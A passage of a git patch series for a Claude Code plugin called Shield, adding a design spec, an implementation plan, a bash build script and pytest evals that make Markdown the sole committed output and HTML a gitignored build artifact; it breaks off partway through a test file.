From bc4546f8fdc9d3b5f4a9e2312f24cbb5f2d713a7 Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 13:29:34 +0530 Subject: [PATCH 01/10] =?UTF-8?q?docs(spec):=20single=20canonical=20Shield?= =?UTF-8?q?=20output=20=E2=80=94=20Markdown=20source,=20HTML=20as=20build?= =?UTF-8?q?=20artifact?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Design spec: Markdown is the one committed/authored output; HTML + site assets become local, gitignored build artifacts regenerated on demand by a render-output.sh build script, triggered by a thin /shield render command. Co-Authored-By: Claude Opus 4.8 (1M context) --- ...8-shield-single-canonical-output-design.md | 150 ++++++++++++++++++ 1 file changed, 150 insertions(+) create mode 100644 docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md diff --git a/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md b/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md new file mode 100644 index 00000000..54fc0d6d --- /dev/null +++ b/docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md @@ -0,0 +1,150 @@ +# Shield: one canonical output (Markdown), HTML as a build artifact + +**Date:** 2026-06-08 +**Status:** Approved (design) — pending spec review +**Scope:** Shield plugin output artifacts (`docs/shield/`) + +## Problem + +Shield writes every artifact twice and commits both: + +- `docs/shield/{feature}/*.md` — the authored Markdown +- `docs/shield/{feature}/outputs/**/*.html` — an HTML mirror, plus generated + site assets at the `docs/shield/` root (`index.html`, `manifest.js`, + `shield.css`, `shield-nav.js`, `shield-dashboard.js`) + +Today 41 HTML files are tracked in git alongside their Markdown. This is +confusing and wasteful because the HTML carries **no unique information** — it +is rendered purely from Markdown by `shield/scripts/render-markdown.sh`. 
The +real dependency chain is one-way: + +``` +JSON sidecar (plan.json, prd.meta.json) ← structured source of truth + ↓ authored or rendered +Markdown (.md) ← canonical human deliverable + ↓ render-markdown.sh (pure render) +HTML (.html) + site assets ← view-only, regenerable +``` + +Committing both means: two parallel trees that must stay in sync, doubled diffs +on every change, and a standing drift risk (hand-edited HTML, or stale HTML). + +## Decision + +**Markdown is the single canonical, committed, authored output.** HTML is +demoted to a **local build artifact** — generated on demand, never committed, +treated like `dist/`. + +Chosen over two alternatives: + +- **Keep both committed + CI drift-guard** — rejected; keeps the double tree and + doubled diffs, only papers over the smell. +- **Drop HTML entirely** — rejected; the browsable dashboard (nav, Mermaid, + cross-linking) is the real consumer. + +Confirmed constraint: people open the HTML **locally** in a browser. Nothing +hosts/serves the committed `outputs/` tree, so gitignoring HTML costs only a +"build before you browse" step. + +## Design + +### 1. What stays committed vs. ignored + +**Committed (canonical / source):** +- All `*.md` under `docs/shield/` +- All JSON sidecars: `manifest.json`, `plan.json`, `*.meta.json`, + `*-comments.json`, `grades.json` + +**Gitignored (generated, regenerable):** +- `docs/shield/**/outputs/` — every rendered per-artifact HTML tree +- `docs/shield/index.html` +- `docs/shield/manifest.js` +- `docs/shield/shield.css`, `docs/shield/shield-nav.js`, + `docs/shield/shield-dashboard.js` + +Note: `manifest.json` stays committed (it is the index source); `manifest.js` +is a generated JS mirror and is ignored. + +### 2. Remove already-committed HTML + +`git rm --cached` the 41 tracked `.html` files plus the tracked root site +assets (`docs/shield/index.html`, `docs/shield/manifest.js`). Add the +`.gitignore` rules above in the same commit so they don't reappear. + +### 3. 
Renderers are unchanged + +Skills keep calling `render-markdown.sh` and `write_shield_assets.py` exactly as +they do now. The only difference is the output lands in a gitignored location, +so it never enters a diff. **No renderer code changes.** + +### 4. Build script + thin command trigger + +Two pieces, clearly separated: + +**A. The build script — `shield/scripts/render-output.sh`** (the orchestrator). +This is where all the conversion logic lives. Given an optional feature, it +regenerates the full HTML site from committed Markdown + `manifest.json`: + +- No feature arg → rebuild the whole `docs/shield/` site (every feature's + `outputs/*.html` + the root dashboard `index.html` and assets). +- With a feature arg → rebuild just that feature's `outputs/` + refresh the + root dashboard/manifest assets. + +It is a thin wrapper that drives the **existing** machinery — it loops the +relevant `.md` files through `render-markdown.sh` and then calls +`write_shield_assets.py`. It introduces **no new renderer**. Being a standalone +script, it is runnable and testable on its own (which the eval relies on). + +**B. The command — `/shield render [feature]`** (skill). A thin trigger that +just invokes `render-output.sh [feature]` and reports where the built site is. +No conversion logic in the command itself. + +This is the "build before you browse / share" entry point, run on demand. + +### 5. Skill prose / path references + +Audit the authoring skills (`research`, `prd-docs`, `plan-docs`, `lld-docs`, +`prd-review`, `plan-review`, `review`) and the `output-paths.yaml` registry for +any language that presents the `.html`/`outputs/` paths as *committed +deliverables*. Update them to describe HTML as a local build artifact and point +users at `/shield render` to view. Markdown paths remain the deliverables they +report. + +## Out of scope (YAGNI) + +- New export formats (PDF, Confluence). Markdown-as-source makes these easy + later, but none are built now. 
+- Hosting/serving the dashboard. Local-open only. +- Changing the renderer, shell template, or dashboard behavior. +- Touching the JSON sidecar schemas. + +## Risks / notes + +- **Existing clones with committed HTML:** after this lands, `git rm --cached` + leaves their working-tree HTML in place but now ignored; harmless. Fresh + clones simply won't have HTML until they run `/shield render`. +- **"I opened a stale/missing HTML":** mitigated by the explicit `/shield + render` step and by the fact that rendering is cheap and idempotent. + +## Eval coverage (per CLAUDE.md — mandatory for plugin asset changes) + +This touches plugin assets (new `/shield render` command + skill-prose edits), +so the PR must ship at least one executable eval. Candidate coverage: + +- An eval that runs `render-output.sh` directly against a fixture feature with + committed `.md` + `manifest.json` and asserts the expected `outputs/*.html`, + root `index.html`, and assets are produced (and match a render of the + Markdown). Testing the script directly avoids going through the command layer. +- A repo-hygiene check (eval or test) asserting no `*.html` / generated site + assets are tracked under `docs/shield/` and that the `.gitignore` rules cover + them. + +## Definition of done + +1. `.gitignore` updated; 41 `.html` + root site assets untracked. +2. `render-output.sh` build script added (wraps existing renderers); `/shield + render` command added as a thin trigger. +3. Skill prose + `output-paths.yaml` updated to call HTML a build artifact. +4. Eval(s) above land in the same PR; RED→GREEN paper trail recorded. +5. Plugin version bumped in `.claude-plugin/marketplace.json` (and + `pyproject.toml` if applicable). 
From 1ee3eab00f63a47f6f6f7a09c336be11c5aff6b1 Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 13:45:10 +0530 Subject: [PATCH 02/10] docs(plan): implementation plan for single canonical Shield output Six tasks: complete rerender_all coverage (enhanced-*/detailed/*), add render-output.sh build script, /shield render command, gitignore+untrack HTML, prose updates, version bump. Each task is TDD with an executable eval. Co-Authored-By: Claude Opus 4.8 (1M context) --- ...26-06-08-shield-single-canonical-output.md | 511 ++++++++++++++++++ 1 file changed, 511 insertions(+) create mode 100644 docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md diff --git a/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md b/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md new file mode 100644 index 00000000..08a7c49f --- /dev/null +++ b/docs/superpowers/plans/2026-06-08-shield-single-canonical-output.md @@ -0,0 +1,511 @@ +# Shield Single Canonical Output Implementation Plan + +> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking. + +**Goal:** Make Markdown the single committed Shield output and demote HTML to a locally-built, gitignored artifact regenerated on demand by one build script. + +**Architecture:** Reuse the existing renderers. First make the existing `rerender_all.py` *complete* so it regenerates every HTML we currently commit (main docs, review summaries, **and** the `enhanced-*` / `detailed/*` reviewer docs it currently skips). Add a thin `render-output.sh` that runs `rerender_all.py` (pages) then `write_shield_assets.py` (dashboard + assets). Add a `/shield render` command that just triggers the script. Then `.gitignore` all generated HTML/site assets and `git rm --cached` the 41 already-tracked HTML files + root assets. 
Finally update path-registry/CLAUDE.md prose to call HTML a build artifact. + +**Tech Stack:** Bash + Python 3 (stdlib only for orchestration), `uv` for the markdown-it render dependency, `pytest` for evals. All under `shield/scripts/`. + +--- + +## Spec + +Design doc: `docs/superpowers/specs/2026-06-08-shield-single-canonical-output-design.md` + +## File Structure + +**Modify:** +- `shield/scripts/rerender_all.py` — extend `rerender_all()` to also render `enhanced-*.md` and `detailed/*.md` review sources. Stays page-rendering only (single responsibility). +- `.gitignore` — add rules for generated HTML + root site assets. +- `shield/schema/output-paths.yaml` — header note: `*_html` paths are local build artifacts. +- `CLAUDE.md` — the artifact-output note (currently says "Rendered HTML lands under …") gains "(build artifact — gitignored; run `/shield render`)". + +**Create:** +- `shield/scripts/render-output.sh` — the build script (orchestrator): `rerender_all.py` + `write_shield_assets.py`. +- `shield/commands/render.md` — `/shield render` command (thin trigger). +- `shield/scripts/test_rerender_all.py` — eval: completeness of rendered set. +- `shield/scripts/test_render_output.py` — eval: end-to-end build produces pages **and** assets. +- `shield/scripts/test_gitignore_html_artifacts.py` — eval: `.gitignore` covers the generated artifacts. + +**Remove from git (keep on disk):** +- 41 tracked `*.html` under `docs/shield/**/outputs/`, plus `docs/shield/index.html` and `docs/shield/manifest.js`. + +--- + +## Task 1: Make `rerender_all.py` render the complete HTML set + +Today `rerender_all.py` renders the five main docs + `reviews/*/*/summary.md` only. It silently skips `enhanced-*.md` and `detailed/*.md`, which ARE committed as HTML today. Fix that so nothing is lost when we stop committing HTML. 
+ +**Files:** +- Create: `shield/scripts/test_rerender_all.py` +- Modify: `shield/scripts/rerender_all.py` (the `rerender_all` function body, after the existing `summary.md` loop) + +- [ ] **Step 1: Write the failing test** + +Create `shield/scripts/test_rerender_all.py`: + +```python +"""Eval for rerender_all.py — renders the COMPLETE committed HTML set, +including enhanced-* and detailed/* review docs (regression: those were skipped).""" +from __future__ import annotations + +import importlib.util +import json +import subprocess +from pathlib import Path + +SPEC = Path(__file__).resolve().parent / "rerender_all.py" +_spec = importlib.util.spec_from_file_location("rerender_all", SPEC) +ra = importlib.util.module_from_spec(_spec) +_spec.loader.exec_module(ra) + + +def _fixture(root: Path) -> None: + """A feature with a main doc + a plan review that has summary, enhanced, detailed.""" + feat = root / "feat-x" + (feat).mkdir(parents=True) + (root / "manifest.json").write_text(json.dumps({"schema_version": "2.1", "features": []})) + (feat / "prd.md").write_text("# PRD\n\nbody\n") + rev = feat / "reviews" / "plan" / "2026-06-08" + (rev / "detailed").mkdir(parents=True) + (rev / "summary.md").write_text("# Summary\n\nbody\n") + (rev / "enhanced-plan.md").write_text("# Enhanced\n\nbody\n") + (rev / "detailed" / "agile-coach.md").write_text("# Agile\n\nbody\n") + + +def test_renders_enhanced_and_detailed(tmp_path): + _fixture(tmp_path) + rc = ra.rerender_all(tmp_path) + assert rc == 0 + out = tmp_path / "feat-x" / "outputs" + expected = [ + out / "prd.html", + out / "reviews" / "plan" / "2026-06-08" / "summary.html", + out / "reviews" / "plan" / "2026-06-08" / "enhanced-plan.html", + out / "reviews" / "plan" / "2026-06-08" / "detailed" / "agile-coach.html", + ] + for p in expected: + assert p.is_file(), f"missing rendered page: {p}" +``` + +- [ ] **Step 2: Run test to verify it fails** + +Run: `cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with 
"mdit-py-plugins>=0.4,<1" pytest test_rerender_all.py -v` +Expected: FAIL — `enhanced-plan.html` and `detailed/agile-coach.html` are missing (rerender_all skips them today). + +- [ ] **Step 3: Add the enhanced + detailed render loops** + +In `shield/scripts/rerender_all.py`, inside `rerender_all()`, immediately AFTER this existing block: + +```python + for summary in feature.glob("reviews/*/*/summary.md"): + rel = summary.relative_to(feature).with_suffix(".html") + _render(summary, feature / "outputs" / rel, + f"Review — {feature.name}", output_dir) + count += 1 +``` + +add: + +```python + for enhanced in feature.glob("reviews/*/*/enhanced-*.md"): + rel = enhanced.relative_to(feature).with_suffix(".html") + _render(enhanced, feature / "outputs" / rel, + f"Review — {feature.name}", output_dir) + count += 1 + for detailed in feature.glob("reviews/*/*/detailed/*.md"): + rel = detailed.relative_to(feature).with_suffix(".html") + _render(detailed, feature / "outputs" / rel, + f"Review — {feature.name}", output_dir) + count += 1 +``` + +- [ ] **Step 4: Run test to verify it passes** + +Run: `cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" pytest test_rerender_all.py -v` +Expected: PASS + +- [ ] **Step 5: Commit** + +```bash +git add shield/scripts/rerender_all.py shield/scripts/test_rerender_all.py +git commit -m "fix(shield): rerender_all renders enhanced-* and detailed/* review docs" +``` + +--- + +## Task 2: Create `render-output.sh` build script + +The orchestrator the user asked for: renders all pages, then writes the dashboard + shared assets. Idempotent. 
+ +**Files:** +- Create: `shield/scripts/render-output.sh` +- Create: `shield/scripts/test_render_output.py` + +- [ ] **Step 1: Write the failing test** + +Create `shield/scripts/test_render_output.py`: + +```python +"""Eval for render-output.sh — the full build: pages + dashboard assets.""" +from __future__ import annotations + +import json +import subprocess +from pathlib import Path + +SCRIPT = Path(__file__).resolve().parent / "render-output.sh" + + +def test_build_produces_pages_and_assets(tmp_path): + feat = tmp_path / "feat-x" + feat.mkdir(parents=True) + (tmp_path / "manifest.json").write_text( + json.dumps({"schema_version": "2.1", "features": [{"name": "feat-x"}]}) + ) + (feat / "prd.md").write_text("# PRD\n\nbody\n") + + res = subprocess.run([str(SCRIPT), str(tmp_path)], capture_output=True, text=True) + assert res.returncode == 0, res.stderr + + # pages + assert (feat / "outputs" / "prd.html").is_file() + # dashboard + shared assets + for asset in ["manifest.js", "index.html", "shield.css", + "shield-nav.js", "shield-dashboard.js"]: + assert (tmp_path / asset).is_file(), f"missing asset {asset}" + + +def test_missing_dir_errors(tmp_path): + res = subprocess.run([str(SCRIPT), str(tmp_path / "nope")], + capture_output=True, text=True) + assert res.returncode == 2 + assert "not a dir" in res.stderr +``` + +- [ ] **Step 2: Run test to verify it fails** + +Run: `cd shield/scripts && uv run --with pytest pytest test_render_output.py -v` +Expected: FAIL — `render-output.sh` does not exist yet. + +- [ ] **Step 3: Write the build script** + +Create `shield/scripts/render-output.sh`: + +```bash +#!/usr/bin/env bash +# Build the full Shield HTML site from committed Markdown. +# +# Step 1: render every source .md to its outputs/*.html (rerender_all.py) +# Step 2: write the dashboard + shared assets (write_shield_assets.py) +# +# HTML is a build artifact: it is gitignored and regenerated on demand. +# Markdown + JSON sidecars are the committed source of truth. 
+# +# Usage: +# render-output.sh [OUTPUT_DIR] +# OUTPUT_DIR defaults to /docs/shield +set -euo pipefail + +SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" + +OUTPUT_DIR="${1:-}" +if [[ -z "$OUTPUT_DIR" ]]; then + ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)" + OUTPUT_DIR="$ROOT/docs/shield" +fi + +if [[ ! -d "$OUTPUT_DIR" ]]; then + echo "render-output: not a dir: $OUTPUT_DIR" >&2 + exit 2 +fi + +python3 "$SCRIPT_DIR/rerender_all.py" --output-dir "$OUTPUT_DIR" +python3 "$SCRIPT_DIR/write_shield_assets.py" --output-dir "$OUTPUT_DIR" +echo "render-output: site built at $OUTPUT_DIR" +``` + +- [ ] **Step 4: Make it executable** + +Run: `chmod +x shield/scripts/render-output.sh` +Expected: no output (the repo's pre-commit "scripts with shebangs are executable" hook requires this). + +- [ ] **Step 5: Run test to verify it passes** + +Run: `cd shield/scripts && uv run --with pytest pytest test_render_output.py -v` +Expected: PASS (both tests) + +- [ ] **Step 6: Commit** + +```bash +git add shield/scripts/render-output.sh shield/scripts/test_render_output.py +git commit -m "feat(shield): render-output.sh — one build script for the HTML site" +``` + +--- + +## Task 3: Add the `/shield render` command + +A thin trigger. No logic — it invokes `render-output.sh`. + +**Files:** +- Create: `shield/commands/render.md` + +- [ ] **Step 1: Write the command** + +Create `shield/commands/render.md` (mirrors the frontmatter style of `shield/commands/analyze-plan.md`): + +```markdown +--- +name: render +description: Build the browsable Shield HTML site locally from committed Markdown +args: "[output dir — optional, defaults to docs/shield]" +--- + +# Render Shield Output + +Shield commits Markdown + JSON sidecars only. HTML (per-artifact pages and the +browsable dashboard) is a **local build artifact** — gitignored and regenerated +on demand. Run this command to (re)build the site, then open the HTML locally. 
+ +## Usage + +`/shield render` — rebuild the whole site under `docs/shield/` +`/shield render ` — rebuild a site rooted at a custom dir + +## Behavior + +1. Run the build script, which renders every source `.md` to its + `outputs/*.html` and then writes the dashboard (`index.html`) and shared + assets (`manifest.js`, CSS, nav JS): + + ```bash + "$CLAUDE_PLUGIN_ROOT/scripts/render-output.sh" "$ARGUMENTS" + ``` + + (`$ARGUMENTS` is empty for the default `docs/shield/` location.) + +2. Report the built site path and remind the user the output is gitignored — + open `docs/shield/index.html` in a browser to view. + +## Important + +- This command does NOT author or modify any Markdown — it only renders. +- HTML is never committed; do not `git add` anything under `outputs/` or the + generated root assets. +``` + +- [ ] **Step 2: Verify the command file parses (frontmatter present)** + +Run: `head -6 shield/commands/render.md` +Expected: shows the `---` frontmatter block with `name: render`. + +- [ ] **Step 3: Commit** + +```bash +git add shield/commands/render.md +git commit -m "feat(shield): /shield render command triggers render-output.sh" +``` + +--- + +## Task 4: Gitignore generated HTML and untrack the committed files + +**Files:** +- Modify: `.gitignore` +- Create: `shield/scripts/test_gitignore_html_artifacts.py` +- Remove from index: tracked `*.html` + root assets under `docs/shield/` + +- [ ] **Step 1: Write the failing hygiene test** + +Create `shield/scripts/test_gitignore_html_artifacts.py`: + +```python +"""Eval: .gitignore demotes Shield HTML to a build artifact.""" +from __future__ import annotations + +import subprocess +from pathlib import Path + +ROOT = Path(__file__).resolve().parents[2] # repo root +GITIGNORE = ROOT / ".gitignore" + +REQUIRED_PATTERNS = [ + "**/docs/shield/*/outputs/", + "**/docs/shield/index.html", + "**/docs/shield/manifest.js", +] + + +def test_gitignore_has_html_artifact_rules(): + text = GITIGNORE.read_text() + for pat in 
REQUIRED_PATTERNS: + assert pat in text, f".gitignore missing rule: {pat}" + + +def test_no_shield_html_tracked(): + out = subprocess.run( + ["git", "ls-files", "docs/shield/**/*.html", "docs/shield/manifest.js"], + cwd=ROOT, capture_output=True, text=True, + ) + tracked = [l for l in out.stdout.splitlines() if l.strip()] + assert tracked == [], f"HTML/assets still tracked: {tracked}" +``` + +- [ ] **Step 2: Run test to verify it fails** + +Run: `cd shield/scripts && uv run --with pytest pytest test_gitignore_html_artifacts.py -v` +Expected: FAIL — patterns absent and 41+ HTML files still tracked. + +- [ ] **Step 3: Add the `.gitignore` rules** + +Append to `.gitignore` (after the existing `**/docs/shield/*/.session-transcript.md` block): + +```gitignore +# Shield HTML is a BUILD ARTIFACT, not a source. Markdown + JSON sidecars are +# the committed source of truth. Regenerate the site locally with /shield +# render (scripts/render-output.sh). See docs/superpowers/specs/ +# 2026-06-08-shield-single-canonical-output-design.md +**/docs/shield/*/outputs/ +**/docs/shield/index.html +**/docs/shield/manifest.js +**/docs/shield/shield.css +**/docs/shield/shield-nav.js +**/docs/shield/shield-dashboard.js +``` + +- [ ] **Step 4: Untrack the already-committed HTML + root assets (keep on disk)** + +Run: + +```bash +git ls-files -z \ + 'docs/shield/*/outputs/**' \ + 'docs/shield/index.html' \ + 'docs/shield/manifest.js' \ + 'docs/shield/shield.css' \ + 'docs/shield/shield-nav.js' \ + 'docs/shield/shield-dashboard.js' \ + | xargs -0 --no-run-if-empty git rm --cached --quiet +``` + +Expected: lists the removed paths (≈41 html + index.html + manifest.js). Files remain on disk; only the index entries are dropped. 
+ +- [ ] **Step 5: Run test to verify it passes** + +Run: `cd shield/scripts && uv run --with pytest pytest test_gitignore_html_artifacts.py -v` +Expected: PASS (both tests) + +- [ ] **Step 6: Verify the build still reproduces what was removed** + +Run: `shield/scripts/render-output.sh` then `git status --porcelain docs/shield | grep -c '\.html$' || true` +Expected: `0` — regenerated HTML is ignored (not showing as untracked), proving the build replaces the removed committed files. + +- [ ] **Step 7: Commit** + +```bash +git add .gitignore shield/scripts/test_gitignore_html_artifacts.py +git commit -m "build(shield): gitignore HTML build artifacts; untrack committed HTML" +``` + +--- + +## Task 5: Update path-registry + artifact-output prose + +Stop describing HTML as a committed deliverable; point readers at `/shield render`. The "Rendered HTML lands under …" phrasing lives in exactly three places (confirmed by grep): `shield/hooks/scripts/session-start.sh`, `shield/docs/artifacts.md`, `shield/skills/general/manifest-schema.md`. The per-skill render steps still run unchanged — they just produce gitignored output. + +**Files:** +- Modify: `shield/schema/output-paths.yaml` (top-of-file header comment) +- Modify: `shield/hooks/scripts/session-start.sh` +- Modify: `shield/docs/artifacts.md` +- Modify: `shield/skills/general/manifest-schema.md` + +- [ ] **Step 1: Add a header note to `output-paths.yaml`** + +At the very top of `shield/schema/output-paths.yaml`, add (above the first existing line): + +```yaml +# NOTE: All `*_html` entries below are LOCAL BUILD ARTIFACTS — gitignored and +# regenerated on demand by /shield render (scripts/render-output.sh). The +# committed source of truth is the corresponding Markdown (+ JSON sidecars). 
+``` + +- [ ] **Step 2: Inspect the three "Rendered HTML lands under" call-sites** + +Run: `grep -n "Rendered HTML lands under" shield/hooks/scripts/session-start.sh shield/docs/artifacts.md shield/skills/general/manifest-schema.md` +Expected: one matching line per file. Read each line's surrounding sentence so the edit in Step 3 matches the exact existing text. + +- [ ] **Step 3: Append the build-artifact parenthetical in each of the three files** + +In each file, edit the sentence that begins "Rendered HTML lands under `docs/shield/{feature}/outputs/`" so it ends with the parenthetical. The target sentence must read: + +``` +Rendered HTML lands under `docs/shield/{feature}/outputs/` (build artifact — gitignored; rebuild locally with `/shield render`). +``` + +(Preserve each file's surrounding punctuation/markup; only insert the ` (build artifact — gitignored; rebuild locally with `/shield render`)` clause before the trailing period.) + +- [ ] **Step 4: Grep for any remaining "committed HTML" phrasing** + +Run: `grep -rniE "commit.*\.html|html.*deliverable" shield/ || echo "none"` +Expected: `none` (no prose describing HTML as committed). + +- [ ] **Step 5: Commit** + +```bash +git add shield/schema/output-paths.yaml shield/hooks/scripts/session-start.sh \ + shield/docs/artifacts.md shield/skills/general/manifest-schema.md +git commit -m "docs(shield): describe HTML output as a gitignored build artifact" +``` + +--- + +## Task 6: Version bump + +Per CLAUDE.md: bump the plugin version in `marketplace.json` for any plugin change. Shield has no root `pyproject.toml` (only `shield/backlog/` and `shield/parsers/` have them, untouched here), so only `marketplace.json` changes. + +**Files:** +- Modify: `.claude-plugin/marketplace.json` (shield `version`) + +- [ ] **Step 1: Bump shield version** + +In `.claude-plugin/marketplace.json`, change the `shield` entry `"version": "2.27.0"` to `"version": "2.28.0"` (minor bump — new command + behavior change). 
+ +- [ ] **Step 2: Verify JSON is valid** + +Run: `python3 -m json.tool .claude-plugin/marketplace.json > /dev/null && echo OK` +Expected: `OK` + +- [ ] **Step 3: Commit** + +```bash +git add .claude-plugin/marketplace.json +git commit -m "chore(shield): bump to 2.28.0 — Markdown-canonical output + /shield render" +``` + +--- + +## Final verification (run before opening PR) + +- [ ] **Run the full new eval set:** + +Run: +```bash +cd shield/scripts && uv run --with pytest --with "markdown-it-py>=3,<4" --with "mdit-py-plugins>=0.4,<1" \ + pytest test_rerender_all.py test_render_output.py test_gitignore_html_artifacts.py -v +``` +Expected: all PASS. + +- [ ] **Confirm no HTML is tracked and the build regenerates cleanly:** + +Run: +```bash +git ls-files 'docs/shield/**/*.html' | wc -l # expect 0 +shield/scripts/render-output.sh +git status --porcelain docs/shield | grep '\.html$' || echo "clean (html ignored)" +``` +Expected: `0`, then `clean (html ignored)`. + +- [ ] **PR body notes:** the `/shield render` command is a thin trigger fully exercised by `test_render_output.py`; completeness regression covered by `test_rerender_all.py`; repo hygiene by `test_gitignore_html_artifacts.py`. No `pyproject.toml` bump (shield root has none). 
From 72b3596680281ff76783978b83e1c8b23ff4086e Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 08:25:05 +0000 Subject: [PATCH 03/10] fix(shield): rerender_all renders enhanced-* and detailed/* review docs Co-Authored-By: Claude Opus 4.7 (1M context) --- shield/scripts/rerender_all.py | 10 +++++++ shield/scripts/test_rerender_all.py | 41 +++++++++++++++++++++++++++++ 2 files changed, 51 insertions(+) create mode 100644 shield/scripts/test_rerender_all.py diff --git a/shield/scripts/rerender_all.py b/shield/scripts/rerender_all.py index b1f82783..b2890d86 100755 --- a/shield/scripts/rerender_all.py +++ b/shield/scripts/rerender_all.py @@ -50,6 +50,16 @@ def rerender_all(output_dir: Path) -> int: _render(summary, feature / "outputs" / rel, f"Review — {feature.name}", output_dir) count += 1 + for enhanced in feature.glob("reviews/*/*/enhanced-*.md"): + rel = enhanced.relative_to(feature).with_suffix(".html") + _render(enhanced, feature / "outputs" / rel, + f"Review — {feature.name}", output_dir) + count += 1 + for detailed in feature.glob("reviews/*/*/detailed/*.md"): + rel = detailed.relative_to(feature).with_suffix(".html") + _render(detailed, feature / "outputs" / rel, + f"Review — {feature.name}", output_dir) + count += 1 print(f"rerender_all: rendered {count} page(s)") return 0 diff --git a/shield/scripts/test_rerender_all.py b/shield/scripts/test_rerender_all.py new file mode 100644 index 00000000..b85fb333 --- /dev/null +++ b/shield/scripts/test_rerender_all.py @@ -0,0 +1,41 @@ +"""Eval for rerender_all.py — renders the COMPLETE committed HTML set, +including enhanced-* and detailed/* review docs (regression: those were skipped).""" +from __future__ import annotations + +import importlib.util +import json +import subprocess +from pathlib import Path + +SPEC = Path(__file__).resolve().parent / "rerender_all.py" +_spec = importlib.util.spec_from_file_location("rerender_all", SPEC) +ra = importlib.util.module_from_spec(_spec) 
+_spec.loader.exec_module(ra) + + +def _fixture(root: Path) -> None: + """A feature with a main doc + a plan review that has summary, enhanced, detailed.""" + feat = root / "feat-x" + (feat).mkdir(parents=True) + (root / "manifest.json").write_text(json.dumps({"schema_version": "2.1", "features": []})) + (feat / "prd.md").write_text("# PRD\n\nbody\n") + rev = feat / "reviews" / "plan" / "2026-06-08" + (rev / "detailed").mkdir(parents=True) + (rev / "summary.md").write_text("# Summary\n\nbody\n") + (rev / "enhanced-plan.md").write_text("# Enhanced\n\nbody\n") + (rev / "detailed" / "agile-coach.md").write_text("# Agile\n\nbody\n") + + +def test_renders_enhanced_and_detailed(tmp_path): + _fixture(tmp_path) + rc = ra.rerender_all(tmp_path) + assert rc == 0 + out = tmp_path / "feat-x" / "outputs" + expected = [ + out / "prd.html", + out / "reviews" / "plan" / "2026-06-08" / "summary.html", + out / "reviews" / "plan" / "2026-06-08" / "enhanced-plan.html", + out / "reviews" / "plan" / "2026-06-08" / "detailed" / "agile-coach.html", + ] + for p in expected: + assert p.is_file(), f"missing rendered page: {p}" From 8a8dc6534e11d9466ac8d72b593fe3ea897cecbf Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 08:25:40 +0000 Subject: [PATCH 04/10] =?UTF-8?q?feat(shield):=20render-output.sh=20?= =?UTF-8?q?=E2=80=94=20one=20build=20script=20for=20the=20HTML=20site?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.7 (1M context) --- shield/scripts/render-output.sh | 30 ++++++++++++++++++++++++ shield/scripts/test_render_output.py | 34 ++++++++++++++++++++++++++++ 2 files changed, 64 insertions(+) create mode 100755 shield/scripts/render-output.sh create mode 100644 shield/scripts/test_render_output.py diff --git a/shield/scripts/render-output.sh b/shield/scripts/render-output.sh new file mode 100755 index 00000000..fd4d0ae5 --- /dev/null +++ b/shield/scripts/render-output.sh @@ -0,0 +1,30 @@ 
+#!/usr/bin/env bash
+# Build the full Shield HTML site from committed Markdown.
+#
+# Step 1: render every source .md to its outputs/*.html (rerender_all.py)
+# Step 2: write the dashboard + shared assets (write_shield_assets.py)
+#
+# HTML is a build artifact: it is gitignored and regenerated on demand.
+# Markdown + JSON sidecars are the committed source of truth.
+#
+# Usage:
+#   render-output.sh [OUTPUT_DIR]
+#   OUTPUT_DIR defaults to /docs/shield
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+
+OUTPUT_DIR="${1:-}"
+if [[ -z "$OUTPUT_DIR" ]]; then
+  ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)"
+  OUTPUT_DIR="$ROOT/docs/shield"
+fi
+
+if [[ ! -d "$OUTPUT_DIR" ]]; then
+  echo "render-output: not a dir: $OUTPUT_DIR" >&2
+  exit 2
+fi
+
+python3 "$SCRIPT_DIR/rerender_all.py" --output-dir "$OUTPUT_DIR"
+python3 "$SCRIPT_DIR/write_shield_assets.py" --output-dir "$OUTPUT_DIR"
+echo "render-output: site built at $OUTPUT_DIR"
diff --git a/shield/scripts/test_render_output.py b/shield/scripts/test_render_output.py
new file mode 100644
index 00000000..a62b4344
--- /dev/null
+++ b/shield/scripts/test_render_output.py
@@ -0,0 +1,34 @@
+"""Eval for render-output.sh — the full build: pages + dashboard assets."""
+from __future__ import annotations
+
+import json
+import subprocess
+from pathlib import Path
+
+SCRIPT = Path(__file__).resolve().parent / "render-output.sh"
+
+
+def test_build_produces_pages_and_assets(tmp_path):
+    feat = tmp_path / "feat-x"
+    feat.mkdir(parents=True)
+    (tmp_path / "manifest.json").write_text(
+        json.dumps({"schema_version": "2.1", "features": [{"name": "feat-x"}]})
+    )
+    (feat / "prd.md").write_text("# PRD\n\nbody\n")
+
+    res = subprocess.run([str(SCRIPT), str(tmp_path)], capture_output=True, text=True)
+    assert res.returncode == 0, res.stderr
+
+    # pages
+    assert (feat / "outputs" / "prd.html").is_file()
+    # dashboard + shared assets
+    for asset in ["manifest.js", "index.html", "shield.css",
+                  "shield-nav.js", "shield-dashboard.js"]:
+        assert (tmp_path / asset).is_file(), f"missing asset {asset}"
+
+
+def test_missing_dir_errors(tmp_path):
+    res = subprocess.run([str(SCRIPT), str(tmp_path / "nope")],
